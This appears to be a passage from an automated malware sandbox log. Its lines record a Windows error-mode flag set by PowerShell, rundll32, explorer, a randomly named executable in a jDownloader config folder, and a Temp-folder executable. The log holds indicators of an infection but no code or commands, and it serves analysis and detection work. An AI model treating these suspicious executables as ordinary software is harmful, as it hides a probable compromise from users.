Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
